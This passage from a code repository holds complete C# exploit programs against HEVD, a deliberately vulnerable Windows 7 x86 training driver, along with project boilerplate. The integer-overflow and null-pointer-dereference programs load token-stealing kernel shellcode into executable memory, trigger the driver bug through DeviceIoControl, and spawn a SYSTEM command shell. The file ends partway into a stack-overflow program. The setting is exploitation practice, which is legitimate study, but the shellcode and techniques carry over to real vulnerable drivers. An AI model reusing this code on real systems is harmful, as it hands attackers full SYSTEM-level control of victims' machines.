63 | static extern IntPtr CreateFile(
64 | string lpFileName,
65 | uint dwDesiredAccess,
66 | uint dwShareMode,
67 | IntPtr lpSecurityAttributes,
68 | uint dwCreationDisposition,
69 | uint dwFlagsAndAttributes,
70 | IntPtr hTemplateFile);
71 |
72 | [DllImport("kernel32.dll", SetLastError = true)]
73 | static extern bool DeviceIoControl(
74 | IntPtr hDevice,
75 | uint dwIoControlCode,
76 | byte[] InBuffer,
77 | int nInBufferSize,
78 | IntPtr OutBuffer,
79 | int nOutBufferSize,
80 | ref int pBytesReturned,
81 | IntPtr lpOverlapped);
82 |
83 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
84 | static extern bool CreateProcess(
85 | string lpApplicationName,
86 | string lpCommandLine,
87 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
88 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
89 | bool bInheritHandles,
90 | uint dwCreationFlags,
91 | IntPtr lpEnvironment,
92 | string lpCurrentDirectory,
93 | ref STARTUPINFO lpStartupInfo,
94 | out PROCESS_INFORMATION lpProcessInformation);
95 |
96 | [DllImport("kernel32.dll", SetLastError = true)]
97 | static extern bool CloseHandle(IntPtr hObject);
98 |
99 | [DllImport("kernel32.dll", SetLastError = true)]
100 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
101 |
102 | // Global variables
103 | static IntPtr hDevice = IntPtr.Zero;
104 |
105 | // Helper functions
106 | static void CleanUp()
107 | {
108 | Console.WriteLine("[>] Cleaning up handle object(s)");
109 | if (hDevice != IntPtr.Zero)
110 | {
111 | if (CloseHandle(hDevice))
112 | {
113 | hDevice = IntPtr.Zero;
114 | }
115 | else
116 | {
117 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
118 | }
119 | }
120 | }
121 |
122 | static bool IsWin7x86()
123 | {
124 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
125 | int MajorVersion = 0;
126 | int MinorVersion = 0;
127 | int BuildNumber = 0;
128 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
129 | BuildNumber &= 0xFFFF;
130 |
131 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
132 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
133 | {
134 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
135 | return true;
136 | }
137 | else
138 | {
139 | Console.WriteLine("[-] Unsupported OS is detected");
140 | return false;
141 | }
142 | }
143 |
144 | static bool IsSystem()
145 | {
146 | string user = Environment.UserName;
147 |
148 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
149 | {
150 | return true;
151 | }
152 | else
153 | {
154 | return false;
155 | }
156 | }
157 |
158 | static bool SpawnShell()
159 | {
160 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
161 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
162 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
163 | uint CREATE_NEW_CONSOLE = 0x00000010;
164 | string CurrentDirectory = "C:\\Windows\\System32";
165 | STARTUPINFO si = new STARTUPINFO();
166 | pSec.nLength = Marshal.SizeOf(pSec);
167 | tSec.nLength = Marshal.SizeOf(tSec);
168 |
169 | bool status = CreateProcess(
170 | ApplicationName, null, ref pSec, ref tSec, false,
171 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
172 | ref si, out PROCESS_INFORMATION pi);
173 |
174 | if (status)
175 | {
176 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
177 | WaitForSingleObject(pi.hProcess, 500);
178 | CloseHandle(pi.hProcess);
179 | CloseHandle(pi.hThread);
180 | }
181 | else
182 | {
183 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
184 | }
185 |
186 | return status;
187 | }
188 |
189 | // Main function
190 | static void Main()
191 | {
192 | byte[] shellcode = {
193 | //--[Setup]
194 | 0x60, // pushad
195 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
196 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
197 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
198 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
199 | //--[Copy System PID token]
200 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
201 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
202 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
203 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
204 | 0x75, 0xED, // jnz ->|
205 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
206 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
207 | //--[Recover]
208 | 0x61, // popad
209 | 0x5D, // pop ebp
210 | 0xC2, 0x08, 0x00 // ret 8
211 | };
212 |
213 | Console.WriteLine("--[ HEVD Exploitation : Integer Overflow\n");
214 |
215 | if (!IsWin7x86())
216 | {
217 | return;
218 | }
219 |
220 | // Step 1: Allocate Token Stealing Shellcode
221 | IntPtr ShellcodeBuffer;
222 | uint dwSize = 0x1000;
223 | uint MEM_COMMIT = 0x00001000;
224 | uint MEM_RESERVE = 0x00002000;
225 | uint PAGE_EXECUTE_READWRITE = 0x40;
226 |
227 | Console.WriteLine("[>] Trying to allocate shellcode");
228 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
229 |
230 | if (ShellcodeBuffer == IntPtr.Zero)
231 | {
232 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
233 | return;
234 | }
235 |
236 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
237 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
238 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
239 |
240 | // Step 2: Prepare payload for overwriting kernel pointer
241 | byte[] offset = Encoding.ASCII.GetBytes(new string('A', 0x824));
242 | byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
243 | byte[] delimiter = BitConverter.GetBytes((uint)0xBAD0B0B0);
244 | byte[] payload = new byte[offset.Length + pointer.Length + delimiter.Length];
245 | offset.CopyTo(payload, 0);
246 | pointer.CopyTo(payload, offset.Length);
247 | delimiter.CopyTo(payload, offset.Length + pointer.Length);
248 |
249 | // Step 3: Open driver's handle
250 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
251 | uint GENERIC_READ = 0x80000000;
252 | uint GENERIC_WRITE = 0x40000000;
253 | uint FILE_SHARE_READ = 0x00000001;
254 | uint FILE_SHARE_WRITE = 0x00000002;
255 | uint OPEN_EXISTING = 0x3;
256 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
257 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
258 | IntPtr invalid = new IntPtr(-1);
259 |
260 | Console.WriteLine("[>] Opening {0}", deviceName);
261 | hDevice = CreateFile(
262 | deviceName, GENERIC_READ | GENERIC_WRITE,
263 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
264 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
265 |
266 | if (hDevice == invalid)
267 | {
268 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
269 | return;
270 | }
271 |
272 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
273 |
274 | // Step 4: Trigger integer overflow
275 | uint ioctl = 0x222027;
276 | int BytesReturned = 0;
277 |
278 | Console.WriteLine("[>] Triggering integer overflow");
279 | bool status = DeviceIoControl(hDevice, ioctl, payload, -1, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
280 |
281 | if (!status)
282 | {
283 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
284 | CleanUp();
285 | return;
286 | }
287 | CleanUp();
288 |
289 | // Step 5: Spawn SYSTEM shell
290 | if (IsSystem() && SpawnShell())
291 | {
292 | Console.WriteLine("[+] Exploit is completed successfully");
293 | }
294 | else
295 | {
296 | Console.WriteLine("[-] Failed to exploit");
297 | }
298 | }
299 | }
300 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("IntegerOverflow")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("IntegerOverflow")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("22ce436a-76bf-46d8-b7dc-86330b55c523")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/NullPointerDereference.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {F94165C3-2308-46DE-9D72-DC71C96E537A}
8 | Exe
9 | NullPointerDereference
10 | NullPointerDereference
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace NullPointerDereference
6 | {
7 | class Program
8 | {
9 | [StructLayout(LayoutKind.Sequential)]
10 | struct SECURITY_ATTRIBUTES
11 | {
12 | public int nLength;
13 | public IntPtr lpSecurityDescriptor;
14 | public int bInheritHandle;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
18 | struct STARTUPINFO
19 | {
20 | public int cb;
21 | public string lpReserved;
22 | public string lpDesktop;
23 | public string lpTitle;
24 | public int dwX;
25 | public int dwY;
26 | public int dwXSize;
27 | public int dwYSize;
28 | public int dwXCountChars;
29 | public int dwYCountChars;
30 | public int dwFillAttribute;
31 | public int dwFlags;
32 | public short wShowWindow;
33 | public short cbReserved2;
34 | public IntPtr lpReserved2;
35 | public IntPtr hStdInput;
36 | public IntPtr hStdOutput;
37 | public IntPtr hStdError;
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | struct PROCESS_INFORMATION
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public int dwProcessId;
46 | public int dwThreadId;
47 | }
48 |
49 | [DllImport("ntdll.dll")]
50 | static extern void RtlGetNtVersionNumbers(
51 | ref int MajorVersion,
52 | ref int MinorVersion,
53 | ref int BuildNumber);
54 |
55 | [DllImport("kernel32.dll", SetLastError = true)]
56 | static extern IntPtr VirtualAlloc(
57 | IntPtr lpAddress,
58 | uint dwSize,
59 | uint flAllocationType,
60 | uint flProtect);
61 |
62 | [DllImport("ntdll.dll")]
63 | static extern uint NtAllocateVirtualMemory(
64 | IntPtr ProcessHandle,
65 | ref IntPtr BaseAddress,
66 | uint ZeroBits,
67 | ref uint AllocationSize,
68 | uint flAllocationType,
69 | uint Protect);
70 |
71 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
72 | static extern IntPtr CreateFile(
73 | string lpFileName,
74 | uint dwDesiredAccess,
75 | uint dwShareMode,
76 | IntPtr lpSecurityAttributes,
77 | uint dwCreationDisposition,
78 | uint dwFlagsAndAttributes,
79 | IntPtr hTemplateFile);
80 |
81 | [DllImport("kernel32.dll", SetLastError = true)]
82 | static extern bool DeviceIoControl(
83 | IntPtr hDevice,
84 | uint dwIoControlCode,
85 | byte[] InBuffer,
86 | int nInBufferSize,
87 | IntPtr OutBuffer,
88 | int nOutBufferSize,
89 | ref int pBytesReturned,
90 | IntPtr lpOverlapped);
91 |
92 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
93 | static extern bool CreateProcess(
94 | string lpApplicationName,
95 | string lpCommandLine,
96 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
97 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
98 | bool bInheritHandles,
99 | uint dwCreationFlags,
100 | IntPtr lpEnvironment,
101 | string lpCurrentDirectory,
102 | ref STARTUPINFO lpStartupInfo,
103 | out PROCESS_INFORMATION lpProcessInformation);
104 |
105 | [DllImport("kernel32.dll", SetLastError = true)]
106 | static extern bool CloseHandle(IntPtr hObject);
107 |
108 | [DllImport("kernel32.dll", SetLastError = true)]
109 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
110 |
111 | // Global variables
112 | static IntPtr hDevice = IntPtr.Zero;
113 |
114 | // Helper functions
115 | static void CleanUp()
116 | {
117 | Console.WriteLine("[>] Cleaning up handle object(s)");
118 | if (hDevice != IntPtr.Zero)
119 | {
120 | if (CloseHandle(hDevice))
121 | {
122 | hDevice = IntPtr.Zero;
123 | }
124 | else
125 | {
126 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
127 | }
128 | }
129 | }
130 |
131 | static bool IsWin7x86()
132 | {
133 | string arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
134 | int MajorVersion = 0;
135 | int MinorVersion = 0;
136 | int BuildNumber = 0;
137 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
138 | BuildNumber &= 0xFFFF;
139 |
140 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
141 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
142 | {
143 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
144 | return true;
145 | }
146 | else
147 | {
148 | Console.WriteLine("[-] Unsupported OS is detected");
149 | return false;
150 | }
151 | }
152 |
153 | static bool IsSystem()
154 | {
155 | string user = Environment.UserName;
156 |
157 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
158 | {
159 | return true;
160 | }
161 | else
162 | {
163 | return false;
164 | }
165 | }
166 |
167 | static bool SpawnShell()
168 | {
169 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
170 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
171 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
172 | uint CREATE_NEW_CONSOLE = 0x00000010;
173 | string CurrentDirectory = "C:\\Windows\\System32";
174 | STARTUPINFO si = new STARTUPINFO();
175 | pSec.nLength = Marshal.SizeOf(pSec);
176 | tSec.nLength = Marshal.SizeOf(tSec);
177 |
178 | bool status = CreateProcess(
179 | ApplicationName, null, ref pSec, ref tSec, false,
180 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
181 | ref si, out PROCESS_INFORMATION pi);
182 |
183 | if (status)
184 | {
185 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
186 | WaitForSingleObject(pi.hProcess, 500);
187 | CloseHandle(pi.hProcess);
188 | CloseHandle(pi.hThread);
189 | }
190 | else
191 | {
192 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
193 | }
194 |
195 | return status;
196 | }
197 |
198 | static void Main()
199 | {
200 | byte[] shellcode = {
201 | //--[Setup]
202 | 0x60, // pushad
203 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
204 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
205 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
206 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
207 | //--[Copy System PID token]
208 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
209 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
210 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
211 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
212 | 0x75, 0xED, // jnz ->|
213 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
214 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
215 | //--[Recover]
216 | 0x61, // popad
217 | 0xC3 // ret
218 | };
219 |
220 | Console.WriteLine("--[ HEVD Exploitation : Null Pointer Dereference\n");
221 |
222 | if (!IsWin7x86())
223 | {
224 | return;
225 | }
226 |
227 | // Step 1: Allocate Token Stealing Shellcode
228 | IntPtr ShellcodeBuffer;
229 | uint dwSize = 0x1000;
230 | uint MEM_COMMIT = 0x00001000;
231 | uint MEM_RESERVE = 0x00002000;
232 | uint PAGE_EXECUTE_READWRITE = 0x40;
233 |
234 | Console.WriteLine("[>] Trying to allocate shellcode");
235 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
236 |
237 | if (ShellcodeBuffer == IntPtr.Zero)
238 | {
239 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
240 | return;
241 | }
242 |
243 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
244 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
245 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
246 |
247 | // Step 2: Set shellcode pointer in null page.
248 | IntPtr NullPagePointer = new IntPtr(1);
249 | IntPtr hProcess = (Process.GetCurrentProcess()).Handle;
250 | uint PAGE_READWRITE = 0x04;
251 | byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
252 | uint ntstatus;
253 | uint NT_SUCCESS = 0;
254 |
255 | Console.WriteLine("[>] Trying to allocate null page and set shellcode pointer");
256 | ntstatus = NtAllocateVirtualMemory(
257 | hProcess, ref NullPagePointer, 0, ref dwSize,
258 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
259 |
260 | if (ntstatus != NT_SUCCESS)
261 | {
262 | Console.WriteLine("[-] Failed to allocate null page (code={0})", ntstatus.ToString("X8"));
263 | CleanUp();
264 | return;
265 | }
266 |
267 | Marshal.Copy(pointer, 0, new IntPtr(4), 4);
268 | Console.WriteLine("[+] Null page allocation and shellcode pointer setting are successful");
269 |
270 | // Step 3: Open driver's handle
271 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
272 | uint GENERIC_READ = 0x80000000;
273 | uint GENERIC_WRITE = 0x40000000;
274 | uint FILE_SHARE_READ = 0x00000001;
275 | uint FILE_SHARE_WRITE = 0x00000002;
276 | uint OPEN_EXISTING = 0x3;
277 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
278 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
279 | IntPtr invalid = new IntPtr(-1);
280 |
281 | Console.WriteLine("[>] Opening {0}", deviceName);
282 | hDevice = CreateFile(
283 | deviceName, GENERIC_READ | GENERIC_WRITE,
284 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
285 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
286 |
287 | if (hDevice == invalid)
288 | {
289 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
290 | return;
291 | }
292 |
293 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
294 |
295 | // Step 4: Trigger null pointer dereference
296 | uint ioctl = 0x22202B;
297 | byte[] payload = BitConverter.GetBytes((uint)0xdeadbeef);
298 | int BytesReturned = 0;
299 |
300 | Console.WriteLine("[>] Triggering null pointer dereference");
301 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
302 |
303 | if (!status)
304 | {
305 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
306 | CleanUp();
307 | return;
308 | }
309 | CleanUp();
310 |
311 | // Step 5: Spawn SYSTEM shell
312 | if (IsSystem() && SpawnShell())
313 | {
314 | Console.WriteLine("[+] Exploit is completed successfully");
315 | }
316 | else
317 | {
318 | Console.WriteLine("[-] Failed to exploit");
319 | }
320 | }
321 | }
322 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("NullPointerDereference")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("NullPointerDereference")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("f94165c3-2308-46de-9d72-dc71c96e537a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/PoolOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}
8 | Exe
9 | PoolOverflow
10 | PoolOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PoolOverflow")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PoolOverflow")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("48da5a78-6f29-44d8-8366-e7017b2bff14")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace StackOverflow
6 | {
7 | class Program
8 | {
9 | [StructLayout(LayoutKind.Sequential)]
10 | struct SECURITY_ATTRIBUTES
11 | {
12 | public int nLength;
13 | public IntPtr lpSecurityDescriptor;
14 | public int bInheritHandle;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
18 | struct STARTUPINFO
19 | {
20 | public int cb;
21 | public string lpReserved;
22 | public string lpDesktop;
23 | public string lpTitle;
24 | public int dwX;
25 | public int dwY;
26 | public int dwXSize;
27 | public int dwYSize;
28 | public int dwXCountChars;
29 | public int dwYCountChars;
30 | public int dwFillAttribute;
31 | public int dwFlags;
32 | public short wShowWindow;
33 | public short cbReserved2;
34 | public IntPtr lpReserved2;
35 | public IntPtr hStdInput;
36 | public IntPtr hStdOutput;
37 | public IntPtr hStdError;
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | struct PROCESS_INFORMATION
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public int dwProcessId;
46 | public int dwThreadId;
47 | }
48 |
49 | [DllImport("ntdll.dll")]
50 | static extern void RtlGetNtVersionNumbers(
51 | ref int MajorVersion,
52 | ref int MinorVersion,
53 | ref int BuildNumber);
54 |
55 | [DllImport("kernel32.dll", SetLastError = true)]
56 | static extern IntPtr VirtualAlloc(
57 | IntPtr lpAddress,
58 | uint dwSize,
59 | uint flAllocationType,
60 | uint flProtect);
61 |
62 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
63 | static extern IntPtr CreateFile(
64 | string lpFileName,
65 | uint dwDesiredAccess,
66 | uint dwShareMode,
67 | IntPtr lpSecurityAttributes,
68 | uint dwCreationDisposition,
69 | uint dwFlagsAndAttributes,
70 | IntPtr hTemplateFile);
71 |
72 | [DllImport("kernel32.dll", SetLastError = true)]
73 | static extern bool DeviceIoControl(
74 | IntPtr hDevice,
75 | uint dwIoControlCode,
76 | byte[] InBuffer,
77 | int nInBufferSize,
78 | IntPtr OutBuffer,
79 | int nOutBufferSize,
80 | ref int pBytesReturned,
81 | IntPtr lpOverlapped);
82 |
83 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
84 | static extern bool CreateProcess(
85 | string lpApplicationName,
86 | string lpCommandLine,
87 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
88 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
89 | bool bInheritHandles,
90 | uint dwCreationFlags,
91 | IntPtr lpEnvironment,
92 | string lpCurrentDirectory,
93 | ref STARTUPINFO lpStartupInfo,
94 | out PROCESS_INFORMATION lpProcessInformation);
95 |
96 | [DllImport("kernel32.dll", SetLastError = true)]
97 | static extern bool CloseHandle(IntPtr hObject);
